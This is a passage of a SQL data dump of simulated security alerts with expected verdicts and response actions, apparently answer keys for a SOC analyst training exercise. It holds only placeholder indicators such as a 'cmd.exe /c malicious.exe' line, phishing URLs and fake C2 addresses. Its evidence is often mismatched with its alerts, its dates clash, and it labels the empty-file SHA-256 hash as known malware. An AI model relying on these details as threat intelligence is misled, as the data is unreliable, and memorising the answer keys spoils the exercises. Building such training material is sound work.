activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"classified_project_files.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive project files.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware used by Lazarus 
Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user credentials compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1371, 'Communication with North Korean IPs', 'high', 'Firewall and DNS logs', 'Continuous communication is established with IPs linked to North Korea, confirming the involvement of Lazarus Group. The compromised system is maintaining connection with an external IP associated with command and control activities.', 'Command and Control', 'T1102 - Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:45:23Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.131.222.102\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"malware_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"dns_query\":\"malicious-domain.example.com\",\"user\":\"jdoe\",\"event_id\":\"FW-20231015-0001\"}', '2026-03-01 23:03:23', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.131.222.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group C2 server.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Associated with suspicious activity but not conclusively malicious.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-domain.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known APT infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account associated with the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1372, 'Brute Force Attack Detected from Malicious IP', 'high', 'Splunk', 'Multiple failed login attempts detected from a known malicious IP address targeting user accounts.', 'Brute Force', 'T1110', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T14:32:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"corp-server01\",\"failed_attempts\":\"25\"}', '2026-03-02 03:07:37', '2026-03-10 22:16:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Repeated login failures from a known malicious IP indicate a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1373, 'Malware Detected via Suspicious Process Execution', 'critical', 'Elastic SIEM', 'A process execution was detected involving a file with a known malicious hash.', 'Malware', 'T1059', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"hostname\":\"workstation-07\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-02 03:07:37', '2026-03-09 02:32:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 57 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to execute known malware\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is known to be malicious, confirming the presence of malware.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1374, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was received containing a malicious URL designed to harvest credentials.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T09:50:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"email_sender\":\"spoofed-ceo@fakecompany.com\",\"domain\":\"fakecompany.com\",\"url\":\"http://phishing-portal.com/login\",\"username\":\"victim@company.com\"}', '2026-03-02 03:07:37', '2026-03-07 10:38:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed-ceo@fakecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address known for phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-portal.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are known to be part of phishing attacks, targeting user credentials.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Malicious URL\",\"date\":\"2026-03-02T13:55:06.895Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1375, 'Failed Login Attempts from Internal IP', 'medium', 'Azure Sentinel', 'Numerous failed login attempts detected from an internal IP, indicating potential unauthorized access attempts.', 'Brute Force', 'T1110', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T13:27:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.5\",\"username\":\"testuser\",\"hostname\":\"internal-server\",\"failed_attempts\":\"15\"}', '2026-03-02 03:07:37', '2026-03-07 11:41:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address detected\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures are from an internal IP, likely due to a misconfiguration or user error.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1376, 'Suspicious Domain Access Detected', 'medium', 'Wazuh', 'Access to a suspicious domain detected, possibly indicating a phishing attempt.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T11:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.150\",\"domain\":\"suspicious-website.com\",\"username\":\"employee1\"}', '2026-03-02 03:07:37', '2026-03-07 11:43:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-website.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain flagged for potential phishing\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP listed in suspicious activity reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"While the domain appears suspicious, no malicious activity has been confirmed.\"}', 'Novice', 'SIEM', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
